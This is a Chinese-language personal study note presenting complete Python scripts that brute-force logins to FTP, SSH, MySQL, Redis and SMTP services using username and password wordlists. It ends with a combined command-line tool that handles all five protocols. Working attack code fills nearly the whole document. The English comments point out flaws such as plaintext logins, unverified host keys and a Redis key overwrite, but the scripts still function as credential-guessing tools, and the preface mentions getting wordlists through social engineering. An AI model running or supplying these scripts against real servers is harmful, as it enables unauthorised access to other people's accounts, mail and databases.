用途:个人学习笔记,有所借鉴,欢迎指正!
目录
一、Python-文件传输爆破-ftplib库操作ftp协议
二、Python-登录爆破-paramiko库操作ssh协议
三、Python-数据库爆破-pymysql库操作mysql协议
四、Python-数据库爆破-redis库操作redis协议
五、Python-邮件爆破-smtplib库操作smtp协议
前言:
原理:python的一些库支持FTP、SSH、Redis、SMTP、Mysql等协议远程登录,只需要知道该服务器ip和端口,然后用本机准备好的用户名字典和密码字典进行循环组合尝试爆破登录,其中字典的好坏决定成功的几率,可以尝试弱口令集和社工方式获取,当然也不一定能成功,这只是锄头,挖不挖的进取决于是什么地。
一、Python-文件传输爆破-ftplib库操作ftp协议
FTP服务默认端口:21
1、关键代码解释:
python
from ftplib import FTP
# Illustrative fragment: ip, username and password are supplied by the caller.
# ftplib.FTP is the plain (non-TLS) client, so the login below is sent unencrypted.
ftp = FTP()
ftp.connect(ip, 21) # connect to the FTP server's IP and port
ftp.login(username,password) # attempt a remote login with this username and password
2、完整代码:
python
from ftplib import FTP
import os
def ftp_check(ip, username, password):
    """Try one FTP login against ``ip`` on port 21 and print the outcome.

    The candidate pair is printed first, password included, in clear text.
    A successful login prints 'success' and ends the interpreter via exit().
    Any exception (refused connection, timeout, rejected credentials) prints
    'failed', so the output cannot tell a wrong password from an unreachable
    host. No timeout is set and the session is never closed.

    Every call opens a fresh plain-FTP connection: credentials cross the
    network unencrypted, and each rejected pair is typically one failed-login
    record from the same source address on the server.
    """
    client = FTP()
    print('|'.join(['check->' + ip, username, password]))
    try:
        client.connect(ip, 21)
        client.login(username, password)
        print('success')
        # exit() raises SystemExit, which "except Exception" does not catch.
        exit()
    except Exception:
        print('failed')
if __name__ == '__main__':
    # Wordlists are resolved relative to the current working directory,
    # not the script's own location; adjust the paths to where yours live.
    base_dir = os.getcwd()
    ip = input('please input ftp ip:')
    user_file = base_dir + '/dic/ftp_username.txt'
    pass_file = base_dir + '/dic/ftp_password.txt'
    for user_line in open(user_file):
        username = user_line.replace('\n', '')
        # The password list is reopened and walked in full for every
        # username, one connection attempt per pair.
        for pass_line in open(pass_file):
            password = pass_line.replace('\n', '')
            ftp_check(ip, username, password)
二、Python-登录爆破-paramiko库操作ssh协议
ssh服务默认端口:22
1、关键代码解释:
python
import paramiko
# Create the SSH client object.
ssh = paramiko.SSHClient()
# Allow connecting to hosts that are not in the known_hosts file.
# AutoAddPolicy accepts whatever key an unknown host presents, so the
# server's identity is not verified.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Connect remotely with a username and password (the port is passed as the string "22").
ssh.connect(ip,"22",username,password)
2、完整代码:
python
import paramiko,os
def ssh_check(ip, username, password):
    """Try one SSH password login against ``ip`` on port 22 and print the outcome.

    The candidate pair is printed first, password included, in clear text.
    A successful login prints 'success' and ends the interpreter via exit().
    Any exception (network error, banner timeout, rejected credentials)
    prints 'failed', so the causes are indistinguishable in the output.
    The client is never closed.

    Each call is a separate connection and authentication attempt; on the
    server these usually appear as repeated password failures from one
    source address.
    """
    print('|'.join(['check->' + ip, username, password]))
    client = paramiko.SSHClient()
    # AutoAddPolicy accepts the key of any host not already known, so the
    # server's identity is not verified before the password is offered.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(ip, port="22", username=username, password=password)
        print('success')
        # exit() raises SystemExit, which "except Exception" does not catch.
        exit()
    except Exception:
        print('failed')
if __name__ == '__main__':
    # Wordlists are resolved relative to the current working directory;
    # adjust the paths to where yours live.
    base_dir = os.getcwd()
    ip = input('please input ssh ip:')
    user_file = base_dir + '/dic/ssh_username.txt'
    pass_file = base_dir + '/dic/ssh_password.txt'
    for user_line in open(user_file):
        username = user_line.replace('\n', '')
        # The password list is reopened and walked in full for every username.
        for pass_line in open(pass_file):
            password = pass_line.replace('\n', '')
            ssh_check(ip, username, password)
三、Python-数据库爆破-pymysql库操作mysql协议
mysql服务默认端口:3306
1、关键代码解释:
python
import pymysql
# Connect to a remote MySQL service.
# NOTE(review): because database='mysql' is requested, an account with a valid
# password but no access to that schema would presumably be rejected as well.
conn_obj = pymysql.connect(
    host=ip, # IP address of the MySQL server
    port=3306, # default MySQL port
    user=username, # user name
    password=password, # password (passwd is accepted as a shorthand)
    database='mysql', # schema name (db is accepted as a shorthand)
    charset='utf8' # character encoding
)
2、完整代码:
python
import pymysql,os
def mysql_check(ip, username, password):
    """Try one MySQL login against ``ip`` on port 3306 and print the outcome.

    The candidate pair is printed first, password included, in clear text.
    A successful connection prints 'success' and ends the interpreter via
    exit(). Every exception is swallowed silently, so a rejected password,
    a refused connection and a missing schema privilege all look the same:
    no output at all. The connection object is never closed.

    Each call is a separate handshake; the server side sees one
    access-denied event per rejected pair.
    """
    print('|'.join(['check->' + ip, username, password]))
    settings = {
        'host': ip,
        'port': 3306,
        'user': username,
        'password': password,
        'database': 'mysql',
        'charset': 'utf8',
    }
    try:
        connection = pymysql.connect(**settings)
        print('success')
        # exit() raises SystemExit, which "except Exception" does not catch.
        exit()
    except Exception:
        pass
if __name__ == '__main__':
    # Wordlists are resolved relative to the current working directory;
    # adjust the paths to where yours live.
    base_dir = os.getcwd()
    # The prompt text says "ssh" although this script talks to MySQL.
    ip = input('please input ssh ip:')
    user_file = base_dir + '/dic/mysql_username.txt'
    pass_file = base_dir + '/dic/mysql_password.txt'
    for user_line in open(user_file):
        username = user_line.replace('\n', '')
        # The password list is reopened and walked in full for every username.
        for pass_line in open(pass_file):
            password = pass_line.replace('\n', '')
            mysql_check(ip, username, password)
四、Python-数据库爆破-redis库操作redis协议
redis服务默认端口:6379,远程登录不需要账号,只要密码
1、关键代码解释:
python
import redis
# Connect to a remote Redis service.
redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
# Store a key to test whether the password is correct; with a wrong password
# the write fails and raises. Note that on success this writes (and would
# overwrite) the key 'test' in db 0 on the server.
redis_conn.set('test', 'laowang')
2、完整代码:
python
import redis,os
def redis_check(ip, password):
    """Try one Redis password against ``ip`` on port 6379 and print the outcome.

    The candidate password is printed first, in clear text. The password is
    validated by issuing SET test laowang against db 0, so a success leaves
    that key behind on the server and overwrites any existing key named
    'test'. Success prints 'success' and ends the interpreter via exit().
    Every exception is swallowed silently, so a wrong password and an
    unreachable server both produce no output.
    """
    print('|'.join(['check->' + ip, password]))
    try:
        client = redis.Redis(host=ip, port=6379, password=password, db=0)
        # The write doubles as the authentication probe.
        client.set('test', 'laowang')
        print('success')
        # exit() raises SystemExit, which "except Exception" does not catch.
        exit()
    except Exception:
        pass
if __name__ == '__main__':
    # The wordlist is resolved relative to the current working directory;
    # adjust the path to where yours lives.
    base_dir = os.getcwd()
    # The prompt text says "ssh" although this script talks to Redis.
    ip = input('please input ssh ip:')
    pass_file = base_dir + '/dic/redis_password.txt'
    # Redis is tried with a password only, so there is no username list.
    for pass_line in open(pass_file):
        password = pass_line.replace('\n', '')
        redis_check(ip, password)
五、Python-邮件爆破-smtplib库操作smtp协议
smtp服务默认端口:25
1、关键代码解释:
python
import smtplib
# Create the SMTP client object.
smtpObj = smtplib.SMTP()
# Connect to the remote SMTP service; 25 is the SMTP port.
# 'smtp.' is prepended, so ip is expected to hold a mail domain rather than an address.
smtpObj.connect('smtp.'+ip, 25)
# Attempt to log in with the username and password.
# No starttls() is called first, so the login is sent over the plain connection.
smtpObj.login(username, password)
2、完整代码:
python
import smtplib,os
def email_check(ip, username, password):
    """Try one SMTP login on port 25 of host 'smtp.' + ``ip`` and print the outcome.

    ``ip`` is used as a domain suffix: the host contacted is 'smtp.' + ip.
    The candidate pair is printed first, password included, in clear text.
    A successful login prints 'ok' and ends the interpreter via exit().

    Only smtplib.SMTPException is handled (printing "Error"), which covers
    rejected credentials as well as a server that offers no AUTH on this
    connection. Socket-level failures such as an unresolvable host name are
    not caught and propagate to the caller. starttls() is never called, so
    the login is attempted over the plain connection, and the session is
    never closed.
    """
    print('|'.join(['check->' + ip, username, password]))
    try:
        session = smtplib.SMTP()
        session.connect('smtp.' + ip, 25)
        session.login(username, password)
        print('ok')
        # exit() raises SystemExit, which is not an SMTPException.
        exit()
    except smtplib.SMTPException:
        print("Error")
if __name__ == '__main__':
    # Wordlists are resolved relative to the current working directory;
    # adjust the paths to where yours live.
    base_dir = os.getcwd()
    user_file = base_dir + '/dic/email_username.txt'
    pass_file = base_dir + '/dic/email_password.txt'
    for user_line in open(user_file):
        username = user_line.replace('\n', '')
        # The mail domain is whatever follows the first '@'; a line without
        # '@' raises IndexError here.
        ip = username.split('@')[1]
        # The password list is reopened and walked in full for every address.
        for pass_line in open(pass_file):
            password = pass_line.replace('\n', '')
            email_check(ip, username, password)
六、整合五种协议爆破完整脚本
from ftplib import FTP
import paramiko
import pymysql
import redis
import smtplib
import os,sys
def ftp_check(ip, username, password):
    """Try one FTP login against ``ip`` on port 21 and print the outcome.

    The candidate pair is printed first, password included, in clear text.
    A successful login prints 'success' and ends the interpreter via exit().
    Any exception (refused connection, timeout, rejected credentials) prints
    'failed', so the causes are indistinguishable in the output. No timeout
    is set and the session is never closed.

    The plain ftplib.FTP client is used, so credentials cross the network
    unencrypted; each rejected pair is typically one failed-login record
    from the same source address on the server.
    """
    client = FTP()
    print('|'.join(['check->' + ip, username, password]))
    try:
        client.connect(ip, 21)
        client.login(username, password)
        print('success')
        # exit() raises SystemExit, which "except Exception" does not catch.
        exit()
    except Exception:
        print('failed')
def ssh_check(ip, username, password):
    """Try one SSH password login against ``ip`` on port 22 and print the outcome.

    The candidate pair is printed first, password included, in clear text.
    A successful login prints 'success' and ends the interpreter via exit().
    Any exception prints 'failed', so network errors and rejected
    credentials look the same. The client is never closed.

    Each call is a separate connection and authentication attempt; on the
    server these usually appear as repeated password failures from one
    source address.
    """
    print('|'.join(['check->' + ip, username, password]))
    client = paramiko.SSHClient()
    # AutoAddPolicy accepts the key of any host not already known, so the
    # server's identity is not verified before the password is offered.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(ip, port="22", username=username, password=password)
        print('success')
        # exit() raises SystemExit, which "except Exception" does not catch.
        exit()
    except Exception:
        print('failed')
def mysql_check(ip, username, password):
    """Try one MySQL login against ``ip`` on port 3306 and print the outcome.

    The candidate pair is printed first, password included, in clear text.
    A successful connection prints 'success' and ends the interpreter via
    exit(). Every exception is swallowed silently, so a rejected password
    and a refused connection both produce no output. The connection object
    is never closed.
    """
    print('|'.join(['check->' + ip, username, password]))
    settings = {
        'host': ip,            # IP address of the MySQL server
        'port': 3306,          # default MySQL port
        'user': username,      # user name
        'password': password,  # password (passwd is accepted as a shorthand)
        'database': 'mysql',   # schema name (db is accepted as a shorthand)
        'charset': 'utf8',     # character encoding
    }
    try:
        connection = pymysql.connect(**settings)
        print('success')
        # exit() raises SystemExit, which "except Exception" does not catch.
        exit()
    except Exception:
        pass
def redis_check(ip, password):
    """Try one Redis password against ``ip`` on port 6379 and print the outcome.

    The candidate password is printed first, in clear text. The password is
    validated by issuing SET test xiaodi against db 0, so a success leaves
    that key behind on the server and overwrites any existing key named
    'test'. Success prints 'success' and ends the interpreter via exit().
    Every exception is swallowed silently, so a wrong password and an
    unreachable server both produce no output.
    """
    print('|'.join(['check->' + ip, password]))
    try:
        client = redis.Redis(host=ip, port=6379, password=password, db=0)
        # The write doubles as the authentication probe.
        client.set('test', 'xiaodi')
        print('success')
        # exit() raises SystemExit, which "except Exception" does not catch.
        exit()
    except Exception:
        pass
def email_check(ip, username, password):
    """Try one SMTP login on port 25 of host 'smtp.' + ``ip`` and print the outcome.

    ``ip`` is used as a domain suffix: the host contacted is 'smtp.' + ip.
    The candidate pair is printed first, password included, in clear text.
    A successful login prints 'ok' and ends the interpreter via exit().

    Only smtplib.SMTPException is handled (printing "Error"); socket-level
    failures such as an unresolvable host name are not caught and propagate.
    starttls() is never called, so the login is attempted over the plain
    connection, and the session is never closed.
    """
    print('|'.join(['check->' + ip, username, password]))
    try:
        session = smtplib.SMTP()
        session.connect('smtp.' + ip, 25)  # 25 is the SMTP port
        session.login(username, password)
        print('ok')
        # exit() raises SystemExit, which is not an SMTPException.
        exit()
    except smtplib.SMTPException:
        print("Error")
# Entry point of the combined script: picks a protocol from argv[1] and walks
# username/password wordlists, calling the matching *_check for every pair.
if __name__ == '__main__':
    # Wordlist paths below are built from the current working directory.
    pypath = os.getcwd()
    # The usage banner is printed on every run, before arguments are read.
    print('eg:固定字典使用说明:')
    print('python all.py ftp 127.0.0.1')
    print('python all.py ssh 127.0.0.1')
    print('python all.py redis 127.0.0.1')
    print('python all.py mysql 127.0.0.1')
    print('python all.py email')
    print('eg:自定义字典使用说明:')
    print('python all.py ftp 127.0.0.1 user.txt pass.txt')
    print('python all.py ssh 127.0.0.1 user.txt pass.txt')
    print('python all.py redis 127.0.0.1 user.txt pass.txt')
    print('python all.py mysql 127.0.0.1 user.txt pass.txt')
    print('python all.py email user.txt pass.txt')
    # All four positional arguments are read unconditionally, so a run with
    # fewer than four raises IndexError here, before any branch is reached.
    xy=sys.argv[1]
    ip=sys.argv[2]
    zidian = sys.argv[3]
    zidian2=sys.argv[4]
    # No custom dictionary supplied: use the bundled lists under conf/.
    # This test is true only when argv[3] is an empty string.
    if len(zidian)==0:
        if xy=='ftp':
            for username in open(pypath + '/conf/dic_username_ftp.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_ftp.txt'):
                    password = password.replace('\n', '')
                    ftp_check(ip, username, password)
        elif xy=='ssh':
            for username in open(pypath + '/conf/dic_username_ssh.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_ssh.txt'):
                    password = password.replace('\n', '')
                    ssh_check(ip, username, password)
        elif xy=='mysql':
            for username in open(pypath + '/conf/dic_username_mysql.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_mysql.txt'):
                    password = password.replace('\n', '')
                    mysql_check(ip, username, password)
        elif xy=='redis':
            # Redis is tried with a password only; no username list is read.
            for password in open(pypath + '/conf/dic_password_redis.txt'):
                password = password.replace('\n', '')
                redis_check(ip, password)
        elif xy=='email':
            for username in open(pypath + '/conf/dic_username_email.txt'):
                username = username.replace('\n', '')
                # The value read from argv[2] is replaced by the part after the
                # first '@' of each address; a line without '@' raises IndexError.
                ip = username.split('@')[1]
                for password in open(pypath + '/conf/dic_password_email.txt'):
                    password = password.replace('\n', '')
                    email_check(ip, username, password)
    # Custom dictionary supplied (only the ftp branch was changed to use it).
    else:
        if xy=='ftp':
            # zidian/zidian2 are joined to the working directory with a literal
            # backslash, i.e. a Windows-style path separator.
            for username in open(pypath +'\\'+ zidian):
                username = username.replace('\n', '')
                for password in open(pypath +'\\'+ zidian2):
                    password = password.replace('\n', '')
                    ftp_check(ip, username, password)
        # The remaining branches ignore zidian/zidian2 and still read conf/.
        elif xy=='ssh':
            for username in open(pypath + '/conf/dic_username_ssh.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_ssh.txt'):
                    password = password.replace('\n', '')
                    ssh_check(ip, username, password)
        elif xy=='mysql':
            for username in open(pypath + '/conf/dic_username_mysql.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_mysql.txt'):
                    password = password.replace('\n', '')
                    mysql_check(ip, username, password)
        elif xy=='redis':
            for password in open(pypath + '/conf/dic_password_redis.txt'):
                password = password.replace('\n', '')
                redis_check(ip, password)
        elif xy=='email':
            for username in open(pypath + '/conf/dic_username_email.txt'):
                username = username.replace('\n', '')
                ip = username.split('@')[1]
                for password in open(pypath + '/conf/dic_password_email.txt'):
                    password = password.replace('\n', '')
                    email_check(ip, username, password)